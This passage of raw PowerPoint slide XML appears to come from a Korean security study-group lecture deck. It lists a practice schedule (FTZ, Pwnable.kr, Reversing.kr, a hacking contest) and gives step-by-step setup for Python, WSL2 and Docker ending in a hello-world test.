                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> FTZ</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6 ~ 9 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>명</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정보보안</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>시스템해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>웹해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>리버싱</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>)</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실전 문제 풀이</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solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Pwnable.kr   Rebersing.kr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안보지원사 해킹대회 참가</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solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>아직 일정 없음</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>통상 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>월</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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8743380"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32468646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/Environ</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>환경</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951474418"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="1477328"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1313623">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1974683">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Python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파이썬 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WindowUpdate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윈도우 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>업데이트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WSL2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WSL2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Docker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WSL2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>도커</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 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18013425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/Environ/Python</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 설치</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http://www.python.org/downloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>클릭</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. Installer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 실행한 후에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>"Install Now＂</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 선택</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파이썬 환경변수 등록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>:＂Add Python 3.9 to PATH＂ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>선택</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설치가 다 되었으면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, close </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버튼 클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="그림 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D85EF85E-9567-4CD3-87AD-1500199746C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="2337342"/>
            <a:ext cx="4972890" cy="2053401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="화살표: 오른쪽 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD4D78C-DC0B-4185-B84C-5F29563F6287}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217951" y="3229576"/>
            <a:ext cx="814100"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C52A94DE-8EDE-48BB-A509-BF86EFA9E588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797068" y="2537012"/>
            <a:ext cx="4183896" cy="2575672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="직사각형 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA010D5-04A2-428D-9560-CB7AF238B70D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924800" y="4885765"/>
            <a:ext cx="1120588" cy="143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329A3269-BDC4-4143-A2AA-98687A28B010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7620000" y="4840941"/>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3752EC8-FC83-4537-9199-803052D2E780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6860967" y="5923722"/>
            <a:ext cx="4119997" cy="309774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="화살표: 오른쪽 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3FA508F-FE7A-4930-8E98-D6D424352B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10046473" y="5962068"/>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37060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빈 폴더에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 만든다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밑의 내용을 따라서 입력한 후 저장</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윈도우 탐색기의 주소창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>라고 입력한 후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>커맨드 창을 킨다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python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 저장 되어 있는 주소를 저장한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>밑 탐색기 주소창을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ctrl c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>하면 주소가 복사된다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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령 프롬프트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 입력하고 마우스 오른쪽 키를 누르면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>방금 주소가 복사된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>최종 입력은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>빈폴더</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>%” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“python python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.py” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 입력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“helloworld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 가 정상적으로 출력되었으면 환경설치 완료</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="그룹 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{881F4ED7-CAD2-4499-A8FB-4AA2465C9608}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10627762" y="-30288"/>
            <a:ext cx="597159" cy="380332"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="380332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="사각형: 둥근 모서리 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2BE758B-008B-4C5E-9D33-65274DE5779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E9907E9-F1F7-4CDA-9074-A4D81073DB94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="597159" cy="246221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>강의안</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="화살표: 오른쪽 9">
              <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D22FEDFB-D5DD-43FB-B842-FDED15F7E4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3" name="그룹 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C36FBC-D32E-4CD5-8FC6-A2DA3F90F4CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11140752" y="-32218"/>
            <a:ext cx="597159" cy="380332"/>
            <a:chOff x="11140752" y="-32218"/>
            <a:chExt cx="597159" cy="380332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="사각형: 둥근 모서리 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF860FEB-C9E0-4FF0-BD38-24F3489DF14D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11170169" y="9975"/>
              <a:ext cx="464911" cy="338139"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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83A43895-A799-48F9-8CBF-59ADA30BAF94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11140752" y="-32218"/>
              <a:ext cx="597159" cy="246221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>목  차</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="화살표: 오른쪽 12">
              <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C927F5CE-A493-4E1A-949D-C9BADB4A6F27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="11268188" y="149065"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148"/>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그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B1981BE-DA05-40EC-9636-586CE44749FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="392120" y="671720"/>
            <a:ext cx="5485702" cy="252216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="그림 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB0FDE9-38A6-4E49-BBB3-2CE7F6561D43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477481" y="1519558"/>
            <a:ext cx="5314980" cy="1257916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0009E799-BCA1-445E-8E39-7DA60C51DAFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect l="50000" t="95873" r="39571" b="85"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477481" y="3253243"/>
            <a:ext cx="3886533" cy="453223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EEDAA4F-9430-4216-B6E3-8DCC8C43685C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8"/>
          <a:srcRect l="56283" t="17782" r="31193" b="73857"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477481" y="5317986"/>
            <a:ext cx="4320730" cy="868294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{102702D9-44FD-4BB5-A4C3-FA67AABA4FFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
